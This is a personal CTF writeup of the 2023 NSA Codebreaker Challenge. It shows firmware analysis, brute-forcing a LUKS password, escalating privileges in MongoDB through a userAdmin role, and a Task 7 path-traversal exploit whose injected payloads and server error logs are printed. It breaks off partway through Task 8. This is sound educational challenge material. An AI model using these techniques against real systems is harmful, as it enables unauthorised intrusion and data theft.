Preamble
Hello to everyone reading this! This is a collection of writeups for the 2023 NSA Codebreaker Challenge. If you’re wondering why this post is in 2024, the challenge was held in 2023 and extended to January 2024.
Anyway, I had a ton of fun with these challenges (except 7), and I hope you enjoy reading these writeups as much as I enjoyed writing them! I’ll go through each challenge and insert my own personal thoughts and comments along the way, so the writeups will be a bit more informal than usual.
Also as a note, I won’t give specific step-by-step instructions to solve each challenge, but moreso just an overview of the process I took. Anyway, I don’t want to waste any more of your time, so let’s get started!
Task 0
Honestly they should use their CTF-Bot for other stuff than just email verification but that’s just my personal opinion ¯\_(ツ)_/¯. Anyway there’s nothing to say for this one, just authenticate through the bot and get the “flag”.
Task 1 - Find the Unknown object
General programming, database retrieval
The US Coast Guard (USCG) recorded an unregistered signal over 30 nautical miles away from the continental US (OCONUS). NSA is contacted to see if we have a record of a similar signal in our databases. The Coast guard provides a copy of the signal data. Your job is to provide the USCG any colluding records from NSA databases that could hint at the object’s location. Per instructions from the USCG, to raise the likelihood of discovering the source of the signal, they need multiple corresponding entries from the NSA database whose geographic coordinates are within 1/100th of a degree. Additionally, record timestamps should be no greater than 10 minutes apart.
Downloads:
- file provided by the USCG that contains metadata about the unknown signal (USCG.log)
- NSA database of signals (database.db)
Prompt:
- Provide database record IDs, one per line, that fit within the parameters specified above.
The first real task. We’re asked to retrieve database record IDs that match the given logfile below:
The database they give us is in the form of an SQLite 3 database, so we can simply connect with sqlite3
and query the database on the given parameters.
331|26.00298|-83.33024|0 m|331|13:39:22|02/20/2023
555|26.00057|-83.33187|0 m|555|13:41:30|02/20/2023
This gives us our two answers, 331 and 555.
Task 2 - Extract the Firmware
Hardware analysis, Datasheets
Thanks to your efforts the USCG discovered the unknown object by trilaterating the geo and timestamp entries of their record with the correlating entries you provided from the NSA databases. Upon discovery, the device appears to be a device with some kind of collection array used for transmitting and receiving. Further visual inspection shows the brains of this device to be reminiscent of a popular hobbyist computer. Common data and visual ports non-responsive; the only exception is a boot prompt output when connecting over HDMI. Most interestingly there is a 40pin GPIO header with an additional 20pin header. Many of these physical pins show low-voltage activity which indicate data may be enabled. There may be a way to still interact with the device firmware…
Find the correct processor datasheet, and then use it and the resources provided to enter which physical pins enable data to and from this device
Hints:
- Note: For the pinout.svg, turn off your application’s dark mode if you’re unable to see the physical pin labels (eg: ‘P1’, ‘P60’)
- The pinout.svg has two voltage types. The gold/tan is 3.3v, the red is 5v.
- The only additional resource you will need is the datasheet, or at least the relevant information from it
Downloads:
- Rendering of debug ports on embedded computer (pinout.svg)
- image of device CPU (cpu.jpg)
- copy of display output when attempting to read from HDMI (boot_prompt.log)
Prompts:
- Provide the correct physical pin number to power the GPIO header:
- Provide a correct physical pin number to ground the board:
- Provide the correct physical pin number for a UART transmit function:
- Provide the correct physical pin number for a UART receive function:
This time, we’re given two images and a boot log, and we need to identify a few key pins on the device.
I’m honestly not too familiar with hardware at all, so I had to do quite a bit of research for this one. But first, starting with the power pin, since we are powering the GPIO header, we need 3.3v, which is the gold/tan color on the pinout.svg.
Physically, this is pin 51, since the physical pins on the 20 pin extension follow a zig zag pattern. (Notice how pin 41 and pin 42 are on opposite sides, naturally this pattern continues through the header, ending with pin 59 and 60)
Next, any grey pin will work for the ground pin, so I just chose pin 52, which is right next to the 3.3v pin.
For the UART transmit and recieve pins, we need to take a look at the log. The log tells us that the alternative function assignment is ALT3, which is important since these function assignments will vary what each pin does.
Through some more research, I found this datasheet for the BCM2835, which while isn’t exactly the same, is close enough for our purposes.
On this datasheet, ALT3 has transmit and recieve on GPIO32 and 33 respectively. Looking back at the pinout, we see that these are pin 53 and 54, so we have our answers (51, 52, 53, 54)!
Task 3 - Analyze the Firmware
Emulation
Leveraging that datasheet enabled you to provide the correct pins and values to properly communicate with the device over UART. Because of this we were able to communicate with the device console and initiate a filesystem dump.
To begin analysis, we loaded the firmware in an analysis tool. The kernel looks to be encrypted, but we found a second-stage bootloader that loads it. The decryption must be happening in this bootloader. There also appears to be a second UART, but we don’t see any data coming from it.
Can you find the secret key it uses to decrypt the kernel?
Tips:
- You can emulate the loader using the provided QEMU docker container. One download provides the source to build your own. The other is a pre-built docker image. See the README.md from the source download for steps on running it.
- Device tree files can be compiled and decompiled with
dtc
.Downloads:
- U-Boot program loader binary (u-boot.bin)
- Recovered Device tree blob file (device_tree.dtb)
- Docker source files to build the QEMU/aarch64 image (cbc_qemu_aarch64-source.tar.bz2)
- Docker image for QEMU running aarch64 binaries (cbc_qemu_aarch64-image.tar.bz2)
Prompt:
- Enter the decryption key u-boot will use.
After building the provided docker image, I followed the steps in the README with the netcat listeners and dboot, and eventually I got to the initial boot screen.
Anyway, from here there was a lot of stuff I could try, but my first idea was loading the u-boot loader into a decompiler and seeing what I could find.
Lots of mucking around later and staring at uninteresting code, eventually I found this snippet that seemed interesting:
A key and an iv you say? Well, going back to the booted device, we can use the printenv
command to see the environment variables (found via help
), and sure enough, there they are!
Additionally, these two environment variables don’t look like any of the other address variables (see the “0x” on kernel_addr_r?), so they definitely stood out more as well.
But all we have is the address, how do you get the actual key?
Well, with more combing through help
, I found out about the md
command.
Using this, we can dump the memory at the given address, and sure enough, we get the key!
Submitting the hex f41bf6ff71239dc43f83045e453e6b84
works and lets us move on.
Task 4 - Emulate the Firmware
Dynamic Reverse Engineering, Cryptography
We were able to extract the device firmware, however there isn’t much visible > on it. All the important software might be protected by another method.
There is another disk on a USB device with an interesting file that looks to be an encrypted filesystem. Can you figure out how the system decrypts and mounts it? Recover the password used to decrypt it. You can emulate the device using the QEMU docker container from task 3.
Downloads:
- main SD card image (sd.img.bz2)
- USB drive image (usb.img.bz2)
- Linux kernel (kernel8.img.bz2)
- Device tree blob file for emulation (bcm2710-rpi-3-b-plus.dtb.bz2)
Prompt:
- Enter the password used to decrypt the filesystem.
This time, we can actually work with the decrypted full image. Booting up the image following the README again, I noticed this interesting part near the end of the booting sequence
Seems to be some sort of decryption, so probably something we should look out for.
Additionally, on the actual device itself, we have a few interesting folders, /agent
, which is empty for now and /private
:
We also have some interesting files in /opt
:
mount_part
is especially interesting, since it seems like a bash script that is mounting an encrypted partition.
We have some data that gets fed into a sha1 hash, then gets fed into cryptsetup open
as the password. Since we need to find the password for the encrypted partition, this is probably what we’re looking for.
Additionally, in /etc/init.d
, we have this script that runs on boot:
This confirms that mount_part
is the script we should be looking at for the password.
Luckily, we have the NAME
variable easily, by just running hostname
.
However, we don’t have access to the /private/id.txt
file, as it seems to be wiped on boot.
I got really lucky on this next step and just guessed that the 3 characters taken from ID would all be digits (seriously idk how I did that 😭) and brute forced them using a simple script to generate all 3 digit passwords.
Then I just ran them through bruteforce-luks, and sure enough, eventually I got the password!
This corresponded with lowlythyme862
, so that was the final password.
As it turns out, the correct intention was indeed to bruteforce, but instead of base 10 digits, it was hex digits, as id.txt
contained a UUID. I just got really lucky that the 3 characters used in my case all happened to be digits.
Additionally, it was possible to use hashcat
to extract the hash and crack it that way, which would’ve been much faster.
Task 5 - Follow the Data Part 1
Reverse Engineering, Forensics
Based on the recovered hardware the device seems to to have an LTE modem and SIM card implying it connects to a GSM telecommunications network. It probably exfiltrates data using this network. Now that you can analyze the entire firmware image, determine where the device is sending data.
Analyze the firmware files and determine the IP address of the system where the device is sending data.
Prompt:
- Enter the IP address (don’t guess)
So now that we have the password, we have to actually mount the encrypted partition.
Running the mount_part script with id.txt
filled out properly, we can get the decrypted partition mounted on /agent
:
The three important files here are agent
, diagclient
, and dropper
, all of which are binaries part of the C2 process.
Now, the intention of the challenge is to reverse the individual binaries and figure out what’s going on, but when I was solving, I didn’t feel like looking at them in depth at the time (which is a decision that will hurt later but for now its fine).
But since the category of the task was labeled forensics, I thought it would be interesting to extract from the binaries and see if there were any embedded files that could be helpful.
However, when I extracted from the dropper
binary, it generated a very interesting file:
And lo and behold, this has all the information we need.
Submitting the IP 100.108.114.44
works, meaning the binaries are exfiltrating data to this mongodb server.
Task 6 - Follow the Data Part 2
Forensics, Databases, Exploitation
While you were working, we found the small U.S. cellular provider which issued the SIM card recovered from the device: Blue Horizon Mobile.
As advised by NSA legal counsel we reached out to notify them of a possible compromise and shared the IP address you discovered. Our analysts explained that sophisticated cyber threat actors may use co-opted servers to exfiltrate data and Blue Horizon Mobile confirmed that the IP address is for an old unused database server in their internal network. It was unmaintained and (unfortunately) reachable by any device in their network.
We believe the threat actor is using the server as a “dead drop”, and it is the only lead we have to find them. Blue Horizon has agreed to give you limited access to this server on their internal network via an SSH “jumpbox”. They will also be sure not to make any other changes that might tip off the actor. They have given you the authority to access the system, but unfortunately they could not find credentials. So you only have access to the database directly on TCP port 27017
Use information from the device firmware, and (below) SSH jumpbox location and credentials to login to the database via an SSH tunnel and discover the IP address of the system picking up a dead drop. Be patient as the actor probably only checks the dead drop periodically. Note the jumpbox IP is 100.127.0.2 so don’t report yourself by mistake
Downloads:
- SSH host key to authenticate the jumpbox (optional) (jumpbox-ssh_host_ecdsa_key.pub)
- SSH private key to authenticate to the jumpbox:
user@external-support.bluehorizonmobile.com
on TCP port 22 (jumpbox.key)Prompt:
- Enter the IP address (don’t guess)
Now we have access to the attacker’s mongodb server.
After messing a bit to actually install mongosh
and setting up the jumpbox properly, I was able to connect to the database:
This part is a bit scuffed, but basically we know that there’s another IP that’s accessing this database and retrieving the files.
So if we have some way to track what IPs access the database, we can catch the attacker.
Thankfully, we do have a way to track this! The database profiler gives us a way to track all the queries that are run on the database.
However, if we try to set the profiler level to 2, we get an error:
This means our user isn’t authorized to run this command, so we need to find a way to escalate our privileges.
If we list the users in the database, we can see our current maintenance
user:
Interesting, we have the userAdmin
role, which means we can create new users with any role we want.
So all we have to do is make a new user that can actually run setProfilingLevel
and we’re good to go.
Now we can log in as our new user, set the profiling level to 2, and profit!
After waiting a bit, the other IP will query the database and show up in the profiler:
The client
key is the IP we’re looking for, so we can submit 100.94.3.187
and move on!
Task 7 - There is Another
Reverse Engineering, Exploitation
Intelligence sources indicate with high probably there is a second device somewhere. We don’t know where it is physically, but maybe you can find it’s IP address somehow. We expect it is one of the up to 2^20 devices connected to the Blue Horizon Mobile network. Blue Horizon Mobile has explained that their internal network is segmented so all user devices are in the 100.64.0.0/12 IP range.
Figure out how the device communicates with the IP you found in the previous task. It must only do so on-demand otherwise we would have probably discovered it sooner. This will probably require some in depth reverse engineering and some guess work. Use what you learn, plus intuition and vulnerability research and exploitation skills to extract information from the server somehow. Your goal is to determine the IP addresses for any devices that connected to the same server. There should be two addresses, one for the downed device, and another for the second device. Your jumpbox account has been updated to allow you to open TCP tunnels to the server (reconnect to enable the new settings). Remember the jumpbox internal IP is 100.127.0.2
Downloads:
SSH host key to authenticate the jumpbox (optional, same as before) (jumpbox-ssh_host_ecdsa_key.pub)
SSH private key to authenticate to the jumpbox: user@external-support.bluehorizonmobile.com on TCP port 22 (same as before) (jumpbox.key) Prompt:
Enter device IP addresses, one per line (don’t guess)
Now we’re getting to the real tough stuff. This time, we somehow need to find the IP of another device. But where to begin?
C2 Review
Let’s start with an overview of the entire attack process again.
Recall from Task 4 that we have this script that runs on boot:
After mounting the encrypted partition, it runs /agent/start
to start the actual binaries.
Of course in this case /bin/nav
isn’t a real service and is just a placeholder, but the important part is that it runs /agent/agent
with the config file /agent/config
.
Now this binary is the actual C2 agent, so let’s start reversing!
Reversing the C2 Agent
I’ll be using Binja for most of these reverse engineering portions, but the general idea should be the same for any other decompiler (From what I’ve heard it’s even easier on IDA).
First, before we start reversing, let’s look at the config file:
Looks like we have a lot going on here. First, we have some sort of logging mechanism, as well as an option to daemonize the process.
Then, we seem to have some private keys as well as the id file we saw earlier.
Next, we seem to have the host and port for the actual C2 communication.
After that are some options for collection and the dropper. From Task 5/6, we can assume this is just for sending files back to the C2 server through mongodb.
We have the nav service ipc as well, but that probably isn’t useful for us.
Finally we have a key file as well as a restart flag.
Now, because this config has to be parsed by the binary, we can try looking for related strings in the binary itself. Here is the process using “navigate_ipc” as an example:
This leads us straight into our main function:
Yeah, that’s really long…
But there’s a few key parts if we break it down. First comes the parsing of the config file, which are all mostly of the form function(arg1, "config_option", arg2)
, so they stand out quite a bit.
Next is this section, which seems to be spawning 3 threads
Each thread has a log message at the start like so:
So we can rename the above to their respective names:
The upload_thread is the thing that actually sends files back to the C2 server by calling dropper
so we can ignore that.
Honestly I’m not to sure what collect_thread
does, but it seems to be related to the collectors_usb
and collectors_ipc
options in the config file.
But importantly, the cmd_thread
is the one that actually handles the C2 communication, so we should take a look at that.
I won’t go super in depth right now, but essentially one of the commands that the cmd_thread
can run is this:
Which sets some enviroment variables and then runs /agent/diagclient
. This is the other point of contact we’re looking for, a ssh connection to the IP we found in Task 6.
Double Checking
First, before we even look at diagclient
, let’s see if this theory is actually correct.
From the config file, we can infer that the private key used for the ssh connection is /private/id_ed25519
, and our user should be nonroot_user
.
We can set up the jumpbox to point to port 22 for ssh like so:
And then connect with
If we connect and send an empty line, here’s what we get:
So it seems that diagclient
should be sending an HTTP request over this SSH connection.
Alright, now to actually reverse diagclient
.
Reversing diagclient
Thankfully, diagclient
isn’t stripped like agent
was, but… it’s Golang.
Reversing Golang is honestly a pain just because of how big everything gets, so it’s a good thing we can reach main.main
easily.
Here’s a basic rundown of main.main
, since I don’t want to go in depth with Go reversing:
First, it extracts the enviroment variables that were set earlier from agent
.
Then, it does some double-checking with the private key and expected host key to make sure they match.
Next, it establishes the actual ssh connection
Finally, it gathers some information about the device with diagclient/procinfo.ProcInfo
, encodes it as json, creates a HTTP request with that json, and sends it over the ssh connection.
After sending it over, it reads the returned HTTP response and parses its body as json as well. This parsing even includes a bit where the diagclient
process can run other system commands, but that is unused for this challenge.
Alright, well now we know that it’s an HTTP request, why not just do it ourselves?
Find the params
Here’s a quick little script I wrote to send arbitrary json to the server:
When we run this, we get this response back:
So it works! But, now what? We need to figure out how to send useful json to the server.
Back to more Go reversing :/
Since we know this is a Go binary, let’s try seeing if we can find any information about the types. I ended up using GoReSym from Mandiant, which produced a giant json file with a bunch of information about the binary.
Some searching shows that there exists main_StatusUpdate
and main_CommandResponse
structs, which should be the types for the json we’re sending:
Cleaned up, they should look like this:
Going back to Binja, we can see that the keys for json should be "status_data"
and "command_response"
respectively:
Let’s try submitting some valid, but empty json:
This time, we get a different response.
{diagserver} 2024/01/13 02:51:06.101452 received StatusUpdate with CommandResponse
{diagserver} 2024/01/13 02:51:06.101459 Invalid length for command_response.starttime: len() = 0 != 25
{diagserver} 2024/01/13 02:51:06.101471 Content-Length: 0
{diagserver} 2024/01/13 02:51:06.101475 server to client body:
After a bit of trial and error, we find that if command_response
is included in the json, it must have both a starttime
and endtime
field, and they must be 25 characters long.
But now what?
I love fuzzing wow fuzz omg wow amazing
At this point I got really stuck, I wasn’t sure how to even begin attacking the remote server.
I ended up going down a bunch of rabbit holes, like improper json parsing, HTTP injection, and even possible command injection through the cmd
field.
But nothing seemed to work.
Eventually, I just started manually fuzzing the json to see if anything interesting would happen (I was really desperate at this point).
As luck would have it, at some very late hour, one particular payload did indeed result in something interesting.
{diagserver} 2024/01/13 02:56:55.722170 received StatusUpdate with CommandResponse
{diagserver} 2024/01/13 02:56:55.722228 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/AAAAAAAAAAAAAAAAAAAAAAAA\x00.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/AAAAAAAAAAAAAAAAAAAAAAAA\x00.json: invalid argument
{diagserver} 2024/01/13 02:56:55.722244 Content-Length: 0
{diagserver} 2024/01/13 02:56:55.722248 server to client body:
An error on a file path? Interesting…
It seems the starttime
field gets directly appended to the file path, so we can use this to leak arbitrary file paths.
But wait… what’s that I see just before our input… by-ip/64/7F/00/02/
?
And what was our jumpbox IP again? 100.127.0.2
. An exact match!
So now our plan is to use the file traversal to go back up through each folder and leak the IP, byte by byte.
We can get different errors by using a valid path but bad file like so, which tells us if we’re on the right track or not:
{diagserver} 2024/01/13 03:15:53.278825 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../00/./././././.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../00/./././././.json: no such file or directory
{diagserver} 2024/01/13 03:17:25.273965 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../64/./././././.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../64/./././././.json: permission denied
Additionally, if we don’t get an error at all, we must have reached a completely valid folder, so we can stop there.
In the end, this was the solver I ended up using:
After running and waiting a bit, we get our two IPs!
100.67.135.8
100.76.16.177
Honestly, this challenge isn’t horribly difficult, but my main issue with it is that I really don’t like the jump from finding the JSON types to just guessing that start_time
had path injection. There was no leadup at all and it just seemed super guessy that it would work.
Task 8 - Decrypt the Comms
Reverse Engineering, Cryptography
The security team at Blue Horizon Mobile was able to capture a packet destined to the device under investigation. It looks to be encrypted, and a quick analysis of the firmware show it uses an HMAC scheme for authentication.
Can you decrypt the packet and recover the secret HMAC key the software uses to verify the contents?
Downloads:
- Packet capture (capture.pcap)
Prompt:
- Enter the HMAC key string used to authenticate the given packet.
This time, we’re given a PCAP that’s supposedly encrypted. We’re also told it uses an HMAC scheme for authentication and we need to recover the secret HMAC key. This means we probably also have decrypt the packet in the process.
Inside the PCAP, there’s only a single UDP packet:
The packet is a UDP payload to port 9000 that’s 288 bytes long. We know this is must be talking with the device, so there must be logic in one of the binaries that handles this.
If we recall back to the config
file that was passed into the agent
binary, we have this
Looking back at the main
function of agent
, there’s a few things we can do.
First, there’s one function (sub_402640
) that gets called over and over with readable string arguments, so let’s call that log_message
.
Then, after the option parsing in main
, there’s also this snippet:
Going through each sub_
function, we immediately see calls to log_message
:
Pretty clearly, these are the functions that act as different threads for the C2 process, so let’s rename them.
For the upload thread, it sets the enviroment variables DB_DATABASE
, DB_COLLECTION
, and DB_URL
, then calls the dropper
binary, which we know is the thing that sends files back to the C2 server.
The collect thread is a bit more complicated, it seems to be opening the devices from the collectors_usb
and collectors_ipc
options in the config file and reading some information from them.
The final cmd
thread is what we’re looking for this time. In this function, before the main loop that runs the thread, it calls sub_401db0
, a function that seemingly starts a listener on a UDP port, just what we’re looking for: